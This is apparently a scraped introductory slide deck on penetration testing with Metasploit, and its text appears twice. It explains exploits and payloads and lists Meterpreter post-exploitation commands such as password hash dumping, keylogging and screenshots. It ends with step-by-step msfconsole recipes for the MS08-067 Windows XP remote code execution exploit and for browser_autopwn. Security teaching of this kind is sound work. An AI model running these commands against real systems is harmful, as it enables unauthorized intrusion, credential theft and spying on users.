What is penetration testing ?
 Why conduct a penetration testing?
 What can be tested ?
 What is metasploit ?
 What is an exploit ?
 What is payload ?
 What is msfconsole ?
 Meterpreter commands.
 Demonstration
 It’s the process to identify security
vulnerabilities in an application by evaluating
the system or network with various malicious
techniques.
 A penetration testing is a method of
evaluating the security of a computer system.
 Purpose of this test is to secure important
data from outsiders like hackers who can
have unauthorized access to system.
 Once vulnerability is identified it is used to
exploit system in order to gain access to
sensitive information.
 Causes of vulnerabilities:
- Design and development errors
- Poor system configuration
- Human errors
 Financial data must be secured while
transferring between different systems.
 Many clients are asking for pen testing as part
of the software release cycle.
 Protecting your brand by avoiding loss of
consumer confidence and business
reputation.
 To secure user data.
 To find security vulnerabilities in an
application.
 Operating system, applications, database,
networking equipments etc.
 Dynamic websites, in-house applications etc.
 Telephony (war-dialing, remote access etc.)
 Personnel (screening process, social
engineering etc.)
 Physical (access controls, dumpster diving
etc.)
 Wireless (wifi, Bluetooth, IR, GSM, RFID etc.)
 The Metasploit project is an open-source,
computer security project which provides
information about security vulnerabilities and
aids in penetration testing and IDS signature
development.
 Metasploit is an framework which is used for
the hacking of different kinds of
applications,operating systems,web
applications etc.
 Metasploit contain various exploits, payloads,
modules etc.
 Metasploit Framework is especially used by
many of the hackers to generate payloads
and attack the systems.
 As Metasploit is an open source where any
one can use it.This framework supports
different operating systems like windows,
linux ,mac os x etc.
 Exploit  used to take advantage of a
security flaw within a system, network, or
application.
 Payload  is code that our victim computer
to execute by the Metasploit framework.
 Module  a small piece of code that can be
added to the Metasploit framework to
execute an attack.
 Shell-code  a small piece of code used as a
payload.
 A vulnerability is a security hole in a piece of
software, hardware or operating system that
provides a potential angle to attack the
system.
 A vulnerability can be as simple as weak
passwords or as complex as buffer overflows
or SQL injection vulnerabilities.
 To take advantage of a vulnerability, you
often need an exploit, a small and highly
specialized computer program whose only
reason of being is to take advantage of a
specific vulnerability and to provide access to
a computer system.
 Exploits often deliver a payload to the target
system to grant the attacker access to the
system.
 A payload is the piece of software that lets you
control a computer system after it’s been
exploited.
 The payload is typically attached to and
delivered by the exploit.
 Metasploit most popular payload is called
Meterpreter, which enables you to do all sorts of
funky stuff on the target system. For example,
you can upload and download files from the
system, take screenshots, and collect password
hashes etc.
 MSFconsole is an all-in-one interface to most
of the features in Metasploit.
 MSFconsole can be used to launch attacks,
creating listeners, and much, much more.
 Commands :
 Show exploits
 Show payloads
 Show options
 Use exploit
 set payload
 Set LHOST
 Set RHOST
 Back
 Info
 Session
▪ Session –l
▪ Session –i 1
 Getuid -> show uid
 Ps -> show active process
 Migrate -> command used when hacker want
to migrate his process to any administrative
privileges process.
 Hashdump -> to dump password hash.
 Screenshot -> to take screenshot of victim.
 Shell -> to enter into the victim shell.
 download C:<file name>
 upload C:<file name>
 keyscan_start -> start sniffing key strokes.
 keyscan_dump
 keyscan_stop
 uictl disable keyboard
 uictl enable keyboard
 Netapi Exploit ( Remote Code Execution )
[Win XP SP-2,3]
 use exploit/windows/smb/ms08_067_netapi
 show options
 set RHOST [target IP]
 set PAYLOAD windows/meterpreter/bind_tcp
 set LHOST [hacker IP]
 exploit
 Autopwn auxiliary [ combo of may exploits ]
 use auxiliary/server/browser_autopwn
 show options
 set LHOST <My IP>
 set SRVHOST < My Server is hosted on my
computer so again my IP >
 set SRVPORT 80
 set URIPATH /
 exploit
Pentesting with linux
Pentesting with linux
Pentesting with linux
Pentesting with linux

Pentesting with linux

  • 2.
    What is penetrationtesting ?  Why conduct a penetration testing?  What can be tested ?  What is metasploit ?  What is an exploit ?  What is payload ?  What is msfconsole ?  Meterpreter commands.  Demonstration
  • 3.
     It’s theprocess to identify security vulnerabilities in an application by evaluating the system or network with various malicious techniques.  A penetration testing is a method of evaluating the security of a computer system.  Purpose of this test is to secure important data from outsiders like hackers who can have unauthorized access to system.
  • 4.
     Once vulnerabilityis identified it is used to exploit system in order to gain access to sensitive information.  Causes of vulnerabilities: - Design and development errors - Poor system configuration - Human errors
  • 5.
     Financial datamust be secured while transferring between different systems.  Many clients are asking for pen testing as part of the software release cycle.  Protecting your brand by avoiding loss of consumer confidence and business reputation.  To secure user data.  To find security vulnerabilities in an application.
  • 6.
     Operating system,applications, database, networking equipments etc.  Dynamic websites, in-house applications etc.  Telephony (war-dialing, remote access etc.)  Personnel (screening process, social engineering etc.)  Physical (access controls, dumpster diving etc.)  Wireless (wifi, Bluetooth, IR, GSM, RFID etc.)
  • 7.
     The Metasploitproject is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.  Metasploit is an framework which is used for the hacking of different kinds of applications,operating systems,web applications etc.
  • 8.
     Metasploit containvarious exploits, payloads, modules etc.  Metasploit Framework is especially used by many of the hackers to generate payloads and attack the systems.  As Metasploit is an open source where any one can use it.This framework supports different operating systems like windows, linux ,mac os x etc.
  • 9.
     Exploit used to take advantage of a security flaw within a system, network, or application.  Payload  is code that our victim computer to execute by the Metasploit framework.  Module  a small piece of code that can be added to the Metasploit framework to execute an attack.  Shell-code  a small piece of code used as a payload.
  • 10.
     A vulnerabilityis a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system.  A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.
  • 11.
     To takeadvantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system.  Exploits often deliver a payload to the target system to grant the attacker access to the system.
  • 12.
     A payloadis the piece of software that lets you control a computer system after it’s been exploited.  The payload is typically attached to and delivered by the exploit.  Metasploit most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes etc.
  • 13.
     MSFconsole isan all-in-one interface to most of the features in Metasploit.  MSFconsole can be used to launch attacks, creating listeners, and much, much more.  Commands :  Show exploits  Show payloads  Show options  Use exploit
  • 14.
     set payload Set LHOST  Set RHOST  Back  Info  Session ▪ Session –l ▪ Session –i 1
  • 15.
     Getuid ->show uid  Ps -> show active process  Migrate -> command used when hacker want to migrate his process to any administrative privileges process.  Hashdump -> to dump password hash.  Screenshot -> to take screenshot of victim.  Shell -> to enter into the victim shell.  download C:<file name>  upload C:<file name>
  • 16.
     keyscan_start ->start sniffing key strokes.  keyscan_dump  keyscan_stop  uictl disable keyboard  uictl enable keyboard
  • 17.
     Netapi Exploit( Remote Code Execution ) [Win XP SP-2,3]  use exploit/windows/smb/ms08_067_netapi  show options  set RHOST [target IP]  set PAYLOAD windows/meterpreter/bind_tcp  set LHOST [hacker IP]  exploit
  • 20.
     Autopwn auxiliary[ combo of may exploits ]  use auxiliary/server/browser_autopwn  show options  set LHOST <My IP>  set SRVHOST < My Server is hosted on my computer so again my IP >  set SRVPORT 80  set URIPATH /  exploit